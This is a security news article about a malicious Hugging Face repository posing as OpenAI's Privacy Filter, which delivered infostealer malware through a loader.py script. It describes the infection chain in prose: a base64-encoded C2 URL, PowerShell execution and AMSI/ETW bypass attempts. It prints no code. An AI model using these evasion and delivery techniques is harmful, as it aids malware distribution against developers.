A fake OpenAI AI model repository on Hugging Face delivered infostealer malware to Windows systems and briefly became the platform’s top trending project, exposing growing risks in open-source AI supply chains.
A malicious repository on Hugging Face masquerading as an OpenAI release delivered infostealer malware to Windows systems and amassed 244,000 downloads before removal, highlighting growing software supply-chain risks within open-source AI ecosystems.
The fake repository, Open-OSS/privacy-filter, impersonated OpenAI’s legitimate Privacy Filter release and copied its model card almost word-for-word to appear authentic. The repository reportedly climbed to the #1 trending position on Hugging Face within 18 hours, underscoring how public AI repositories are becoming attractive malware distribution channels.
According to AI security firm HiddenLayer, the repository contained a malicious loader.py script that disguised itself as a legitimate AI model setup before triggering a concealed infection chain. The malware disabled SSL verification, decoded a base64-encoded URL linked to jsonkeeper.com, retrieved remote payload instructions, and passed commands to PowerShell while attempting to disable Windows AMSI and ETW protections.
“Using jsonkeeper[.]com as the C2 channel lets the attacker rotate the payload without modifying the repository,” HiddenLayer researchers noted.
HiddenLayer also identified six additional Hugging Face repositories using similar malicious loader logic and linked the campaign to earlier npm typosquatting attacks and fake AI packages on PyPI.
“Traditional SCA was designed to inspect dependency manifests, libraries, and container images, not the increasingly complex behaviors associated with AI development workflows,” said Sakshi Grover, Senior Research Manager for Cybersecurity Services at IDC.
